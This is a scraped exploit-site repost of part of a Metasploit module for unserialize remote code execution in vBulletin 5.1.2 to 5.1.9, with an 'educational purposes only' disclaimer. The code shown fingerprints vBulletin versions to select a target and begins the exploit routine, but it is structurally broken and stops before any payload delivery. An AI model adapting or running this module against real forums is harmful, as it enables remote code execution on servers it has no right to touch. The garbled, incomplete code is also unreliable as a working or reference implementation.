Exploits / Vulnerability Discovered : 2017-07-24 |
Type : webapps |
Platform : php
This exploit / vulnerability Vbulletin 5.1.2 < 5.1.9 unserialize code execution (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
])
end
def check
begin
res = send_request_cgi({ 'uri' => target_uri.path })
if (res && res.body.include?('vBulletin Solutions, Inc.'))
if res.body.include?("Version 5.0")
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body.include?("Version 5.1")
@my_target = targets[2] if target['auto']
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
end
def exploit
print_status("Trying to inferprint the instance...")
@my_target = target
check_code = check
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance")
end
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end